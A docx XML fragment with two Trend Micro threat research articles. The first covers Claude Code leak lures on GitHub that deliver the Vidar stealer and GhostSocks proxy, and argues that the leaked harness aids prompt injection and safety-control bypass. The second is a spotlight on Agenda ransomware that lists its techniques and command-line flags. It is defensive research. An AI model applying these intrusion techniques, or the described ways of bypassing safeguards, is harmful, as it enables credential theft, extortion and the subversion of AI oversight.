        <w:t>Utility software provides additional coverage, with lures masquerading asYouTube_Downloader_x64.7z, OrcaSlicer_x64.7z (a 3D printing slicer), iRemovalPro_x64.7z (an iPhone unlocking tool), and perplexity_computer_x64.7z (impersonating the Perplexity AI search assistant). Each targets a different user demographic, broadening the campaign's reach.</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One pattern is consistent across all lures: a throwaway GitHub account creates a repository with a plausible name, populates it with a minimal README, and hosts a trojanized 7z archive as a GitHub Release asset. The archives range from 78 to 167 MBlarge enough to appear legitimate and to evade some automated scanning systems. Once a repository is flagged and removed, the operators simply create a new account and repeat the process with a different lure name. Confirmed distribution repositories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Our GitHub lure scanner identified 104 repositories created within seven days of the Claude Code leak using related keywords. Of these, three were confirmed to distribute malicious payloads via GitHub</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Releases: leaked-claude-code/leaked-claude-code: distributes ClaudeCode_x64.7z my3jie/leaked-claude-code: repository-based delivery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network data confirmed six additional GitHub distribution URLs used by the broader campaign before the Claude Code pivot: github[.]com/Kawaii-GPT-ai/KawaiiGPT/releases/: KawaiiGPT lure github[.]com/ai-wormGPT/wormGPT/releases/: WormGPT lure github[.]com/claude-ai-opus-4-6/claude-opus-4.6/releases/: Claude Opus 4.6 lure github[.]com/realtime-voice-changer-app/realtime-voice-changer/releases/: Voicemod lure github[.]com/LTX-desktop/LTX-2.3/releases/: LTX video editor lure github[.]com/nvidia-nemoclaw/NemoClaw/releases/: NVIDIA NemoClaw lure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Known threat actor accounts include idbzoomh (taken down by GitHub), idbzoomh1, and my3jie. The accounts are disposable, as operators demonstrate no attachment to any single identity or lure theme.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Infection chain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infection chain is consistent across all lure variants: Discovery: The victim searches for a trending software tool on Google or GitHub. For the Claude Code variant, queries like "leaked Claude Code source" and "Claude Code download" surface the malicious repositories. Lure: The victim lands on a convincing GitHub repository with a README promising free access, leaked features, or cracked versions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Download: The victim downloads a 7z archive (78-167 MB) from GitHub Releases. The archive name matches the lure theme.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Extraction: Inside the archive is TradeAI.exe, a Rust-compiled dropper binary. In the Claude Code variants, the executable is renamed to ClaudeCode_x64.exe or similar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Execution: The dropper deploys two payloads: Vidar Stealer (v18.7): An information stealer performing multi-threaded data theft of browser credentials, cryptocurrency wallets, session tokens, and system information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>GhostSocks: A SOCKS5 proxy tool that tunnels network traffic through the victim's machine, enabling the operators to use compromised hosts as residential proxies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>C&amp;C resolution: Vidar uses dead drop resolvers, which are a Steam Community profile and a Telegram channel,to retrieve the active C&amp;C address, making infrastructure takedowns more difficult.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration: Stolen data is packaged and sent to the Vidar C&amp;C server.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Security implications of the leaked source code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the immediate threat is the social engineering campaign delivering Vidar, the leaked source code itself presents a distinct and longer-lasting risk surface. Security experts have warned that access to approximately 512,000 lines of production code from a frontier AI company opens several attack vectors that extend well beyond using the leak as a lure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Vulnerability research and exploitation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full access to the codebase, both security researchers and threat actors can systematically audit the code for exploitable vulnerabilities. This concern materialized almost immediately. Within days of the leak, a critical vulnerability in Claude Code was publicly reported , demonstrating that the code is being actively analyzed.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agentic nature of Claude Code makes this particularly concerning. Unlike a traditional application, Claude Code interacts with file systems, executes terminal commands, reads and writes files, and manages development environments. A vulnerability in the agentic harness could allow: Arbitrary code execution through crafted inputs or project files Data exfiltration from developer environments via manipulated tool calls Privilege escalation through the tool permission system Prompt injection blueprint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leaked source also reveals exactly how Claude Code constructs its system prompts, parses user instructions, handles tool definitions, and enforces safety boundaries. This is effectively a blueprint for crafting targeted prompt injections, with attackers knowing the precise wording, ordering, and structure of the safety instructions that govern the model's behavior.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This knowledge could be used to bypass safety controls by understanding their exact implementation, craft inputs that exploit parsing edge cases, and design adversarial inputs optimized for the specific prompt architecture. Anti-distillation and competitive intelligence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ANTI_DISTILLATION_CC mechanisms revealed in the source code demonstrate Anthropic's approach to preventing competitors from training on Claude's API outputs. With the implementation details now public, adversaries have a roadmap for circumventing these protections. The cryptographic signatures and fake tool definitions used as canary traps are now visible and can be stripped or avoided. Agentic attack surface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Perhaps the most significant long-term concern is the exposure of the complete "agentic harness," which is the system that enables Claude Code to interact with real computing environments. The source code reveals how the model decides which tools to invoke and in what sequence, the permission model governing file system access, command execution, and network operations, the sandbox boundaries and how they are enforced, and the internal safety classifiers and their decision logic.</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Access to this knowledge gives adversaries a significant advantage in designing attacks against organizations whose developers use Claude Code in their workflows.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MITRE ATT&amp;CK TTPs Tactic Technique ID Description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Resource Development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Stage Capabilities: Upload Malware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T1608.001</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Malware hosted on GitHub Releases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Resource Development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Establish Accounts: Social Media Accounts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T1585.003</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Disposable GitHub accounts for distribution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Initial Access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Phishing: Spearphishing Link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T1566.002</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Lure repositories with download links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Execution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User Execution: Malicious File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T1204.002</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Victim executes trojanized dropper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Defense Evasion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Obfuscated Files or Information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T1027</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Rust-compiled dropper binary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Defense Evasion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Virtualization/Sandbox Evasion: System Checks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T1497.001</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Debug environment and user input checks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Credential Access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Credentials from Password Stores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T1555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Vidar steals browser credentials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Collection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Data from Local System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T1005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Cryptocurrency wallets and session tokens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Command and Control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Web Service: Dead Drop Resolver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T1102.001</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Steam/Telegram profiles for C2 resolution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Command and Control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Proxy: Multi-hop Proxy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T1090.003</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GhostSocks SOCKS5 proxy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Exfiltration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Exfiltration Over C2 Channel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T1041</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Data sent to Vidar C2</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2. TTPs used in the campaign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Security recommendations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Organizations can reduce the risk from this campaign by tightening controls around tool installation, validating software sources, and actively monitoring for malicious activity using the following measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Instruct developers to use verified sources only. Legitimate Claude Code is available only through official channels at claude.ai/install.sh (macOS/Linux) or claude.ai/install.ps1 (Windows), and via Homebrew, WinGet, or the VS Code/JetBrains extensions. npm installation has been deprecated. Any GitHub repository offering a standalone download should be treated as malicious.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Treat GitHub Releases with scrutiny. The campaign abuses GitHub Releases as a trusted delivery mechanism. Large 7z archives (78-167 MB) hosted on newly created repositories with minimal commit history are a strong signal of abuse.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Block known infrastructure. Add the C2 domains and IPs listed in the IOC section to network blocklists.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for infostealer indicators. Watch for credential dumping patterns, connections to Steam Community profiles and Telegram channels used as dead drop resolvers, and unusual SOCKS5 proxy activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit AI tool installations. Establish clear organizational policies for which AI coding tools are approved and how they should be installed. Maintain an allowlist of approved sources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce endpoint detection. Ensure endpoints have detections for Vidar stealer variants and Rust-compiled droppers. The malware's anti-sandbox behavior means static detection rules are especially important. Conclusion: Governance is the control plane for agentic risk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Claude Code leak incident demonstrates that security compromise is not limited to software vulnerabilities; it is frequently enabled by weaknesses in people and organizational processes, which often drive the highest impact. In practice, threat actors did not need a zero-day in the leaked codebase: they leveraged attention, trust signals, and predictable user behavior to achieve execution and credential theft.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pattern becomes more consequential as organizations adopt agentic AI. Agentic systems can plan, reason, and act across enterprise environments, invoking tools, accessing data, and triggering workflows. Because these systems operate through iterative, adaptive loops rather than fully deterministic execution paths, the outcomes can be difficult to predict, trace, or control.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Accordingly, TrendAITM is designing solutions as an Agents Governance Gateway, positioning governance as the control plane, rather than treating the problem as security alone. The objective is to give organizations the ability to discover and inventory agents, observe what they are doing, understand behavior and intent across tool and data interactions, detect unsafe or anomalous actions, and enforce policy so that autonomous capability can be adopted with measurable control and accountability.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Indicators of Compromise (IOCs)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IOCs related to this campaign can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.04.03 14:56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-signals-claude-code-lures-and-github-release-payloads.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ransomware Spotlight: Agenda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March 18, 2026</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Agenda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TrendAITM Research</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Agenda has rapidly grown into one of the most prolific and dangerous ransomware operations, leveraging advanced techniques, cross-platform variants, and alliances with other major threat groups. Its aggressive double-extortion model and expanding victim base across critical industries make it a serious enterprise risk that demands proactive detection and defense.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infographic of "Ransomware Spotlight: Agenda"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Agenda, tracked by TrendAITM Research as Water Galura, is a financially motivated ransomware-as-a-service (RaaS) group that emerged in mid-2022 and operates a double-extortion model, combining file encryption with data theft and leak threats. The group is also known as Qilin.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Its initial activity in July 2022 was observed to deploy Go-based ransomware that offered affiliates customizable builds for encryption behavior, file targeting, and ransom note personalization. Later that year, it introduced Rust-based variants to improve performance and cross-platform support that included Windows, Linux, and ESXi environments. Its recent campaigns were observed to leverage PowerShell-based tooling for lateral movement and deployment in VMware vCenter and ESXi environments.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2024 and 2025, the Agenda ransomware saw a significant operational expansion, where affiliates were observed using additional malware loaders such as SmokeLoader and NETXLOADER, along with defense-evasion techniques including "Bring Your Own Vulnerable Driver" (BYOVD). In some incidents, the group deployed Linux ransomware payloads via legitimate remote management tools; this emphasized the group's flexibility and effectiveness as an industry-agnostic extortion operation.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organizations need to know about the Agenda ransomware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Despite the broad range of industries that the Agenda ransomware has been observed to attack, TrendAITM Research has observed that a significant number of victim organizations come from the manufacturing, healthcare, and technology industries.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Agenda operates a dedicated Tor-based data leak site, which the group uses to demonstrate proof of compromise. This is done to incentivize payment, apply extortion pressure through countdown timers and staged data releases, and publish stolen victim data when ransom demands are unmet.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Ransom demands vary significantly based on victim size, sector, and perceived ability to pay. Multi-million-dollar demands are commonly observed in publicly disclosed incidents involving large enterprises and critical infrastructure.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Agenda became one of the most prolific ransomware operations in 2025, with almost 1,400 disclosed victims on its leak site. It boasted a 538% year- over-year increase in victims from 2024.</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Its activity suggests that the group is just getting started. TrendAITM Research monitoring and data suggest that the Agenda ransomware group is also building its network: The group was linked to several notable threat actors and groups in 2025.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March 2025, the North Korean state-sponsored threat actor known as Moonstone Sleet was observed deploying the Agenda ransomware in limited and targeted operations. This marked a notable intersection of nation-state and cybercriminal activities.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Following the operational disruption of RansomHub ransomware in mid-2025, assessment of threat intelligence and research indicate that its affiliates migrated to the Agenda ransomware infrastructure based on timing correlations, tactical overlaps, and leak-site activity patterns.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 Sept. 15, 2025, DragonForce announced the formation of a strategic alliance with the Agenda and LockBit ransomware groups in a post on a Russian-language underground forum. This coalition potentially enables shared resources, tactics, and infrastructure across three major ransomware operations.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These connections to other threat actor groups emphasize that organizations should equip themselves with systems that provide early detection and mitigation to secure against dangerous groups such as the Agenda ransomware group.Attack chain and techniques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 Agenda ransomware attack chain as of October 2025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2. Agenda ransomware attack chain where the threat actors used SmokeLoader and NETXLOADER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Initial Access In its early operational stages, the Agenda ransomware group primarily relied on initial access brokers (IABs) to establish a foothold in victim networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The group was also observed logging in to systems using stolen credentials and then leveraging process token impersonation to elevate privileges and facilitate lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In recent campaigns, it used fake captcha social engineering for ransomware deployment.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Execution The Agenda ransomware is typically executed via the command line. It accepts a wide range of parameters to customize encryption behavior, propagation, and privilege escalation. These arguments vary across its Go, Rust, and Linux variants. (These are discussed in the "Additional information" section.) The ransomware has been observed to use PowerShell to manage network connections and restart the LanmanWorkstation service after modifying share settings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In domain environments, Agenda leverages PowerShell and Active Directory (AD) commands to enumerate computers. This allows the ransomware to propagate through vCenter and ESXi environments, or terminate virtual machine (VM) clusters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Newer Rust-based variants are known to embed PsExec within the binary. When propagation arguments are used, the malware drops PsExec into the temporary directory to execute the ransomware on remote hosts via service execution. It also employs BYOVD tactics.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Persistence Earlier samples of the Agenda ransomware were observed to utilize various techniques for persistence such as creating a RunOnce registry entry, modifying and disabling the Volume Shadow Copy Service, modifying the ImagePath registry value for service persistence, and installing a scheduled task.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Privilege Escalation The Agenda ransomware uses process token impersonation by parsing configuration accounts to log in and create new malicious processes with high-level user tokens.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also leverages Group Policy modifications across administrative shares to enforce malicious behaviors and maintain control over the entire domain. It also creates backdoor administrative accounts, such as "Supportt," to provide a persistent and elevated entry point into the system.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Lateral Movement The Agenda ransomware enables RDP connections by modifying registry keys and firewall settings to facilitate remote access across the network. It also writes programs to network shares and executes commands on remote systems using the PsExec utility to propagate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware deploys Cobalt Strike to move laterally across the network using Server Message Block (SMB) and Windows administrative shares to deliver additional malicious payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also utilizes administrative shares to distribute malware and secondary tools across numerous network endpoints simultaneously.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It enables SSH for command and control (C&amp;C), using tools like PuTTY to establish connections, transfer files, upload payloads, and execute the ransomware on target Linux and Windows hosts.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Discovery The Agenda ransomware enumerates network shares for encryption using HRSword and built-in commands. It also identifies remote systems and domain controllers with nltest, and performs port scanning, lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TCP connections, and checks processes on specific ports using PC Hunter and YDArkPass. The ransomware also collects system details (such as operating system details, CPU count, and information on memory capacity) and enumerates installed products using Windows Management Instrumentation (WMI) and commands. It then discovers and terminates specific processes using SmokeLoader and retrieves user group details and active sessions via whoami and a query session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Agenda ransomware also obtains Active Directory computer lists and then propagates using PowerShell scripts. It collects domain administrator group members via net group commands and tools like PC Hunter. The Agenda ransomware Rust variant also enumerates ESXi hosts during propagation.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Exfiltration The Agenda ransomware uses the cloud sync service MEGAsync to exfiltrate files to a remote cloud server via HTTP POST.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also employs WinSCP for file exfiltration from victim environments. The ransomware also uses Coroxy/SystemBC to retrieve the victim's username and then encrypts it with RC4 before sending it to the ransomware's C&amp;C server as part of initial registration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware also uses the s5cmd tool to authenticate to cloud object storage and systematically exfiltrate targeted documents, emails, images, and database files from compromised systems.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Defense Evasion The Agenda ransomware terminates antivirus-related services and processes to evade detection and protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It employs the BYOVD technique to terminate security processes, enhancing its ability to evade detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware disguises PuTTY as a legitimate application or renames it to mimic system processes and then uses Thread Local Storage (TLS) callbacks to stealthily execute malicious payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware is then loaded via process injection using NETXLOADER, which is packed with .NET Reactor v6 for obfuscation and software packing.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Credential Access The Agenda ransomware extracts stored Veeam backup credentials by querying the credentials database table.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Command and Control The Agenda ransomware uses SmokeLoader and Coroxy/SystemBC to communicate with the C&amp;C infrastructure over HTTP/HTTPS using direct TCP connections and proxy-based channels.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also uses Coroxy/SystemBC to establish encrypted external and multi-hop proxy tunnels, including Tor. It is also capable of receiving and executing attacker-delivered payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also abuses Mongoose Web Server, which uses HTTP via a legitimate browser process to blend C&amp;C traffic with normal web activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also abuses MeshAgent, the endpoint client of MeshCentral, to transfer and execute ransomware by deploying Linux ransomware binaries onto a Windows host. MeshAgent establishes C&amp;C communication with the MeshCentral server via WebSocket over HTTPS (wss://).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware deploys the open-source remote control and remote scripting solution Remotely to maintain persistent access and control over compromised systems.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Impact The Agenda ransomware encrypts files using AES-256 with RSA-2048 key protection, which supports intermittent and multi-threaded encryption, and selectively targets files and systems based on configuration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It generates the key and IV that was used for encryption using the function generateKye, using the API rand_read(). It then uses AES256 for its file encryption using the randomly generated key. It then encrypts the key using RSA-2048 using the embedded public key from the config file, from the function encryptSymmetricKey.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It terminates and disables system services to disrupt normal operations. It also deletes shadow copies and overwrites data to prevent system recovery.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It then displays its ransom note by changing the desktop wallpaper and modifying system login messages.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It also removes user access by changing account passwords on affected systems, including vCenter and ESXi hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It deletes virtual machine disks and snapshots on ESXi environments that cause permanent data loss.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Early samples of the Agenda ransomware have been observed to be ready for intermittent encryption,adding the -n, -p, fast, skip,and step flags on its configurations.Additional information on the Agenda ransomware and its different variantsAgenda ransomware Go variantThe Agenda ransomware's Go variant accepts the following parameters: -alter {int} - This is a port for the service flag child process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-encryption {value} - This allows threat actors to redefine embed encryptor config to custom.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-ips {IP address} - This allows threat actors to provide IP addresses. -min-size {value} - This determines the minimal file size to encrypt (1 KB, 1 MB, 1 GB, 666 KB, etc.) -no-proc - This means processes will not be killed when the protocol driver is not attached.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-no-services - This means services will not be killed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-password {string} - This requires a password for execution, which also functions as the login credential for the ransomware group's support chat site. -path {directory} - This determines from which path to parse directories. -safe - This prompts the machine to boot into safe mode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
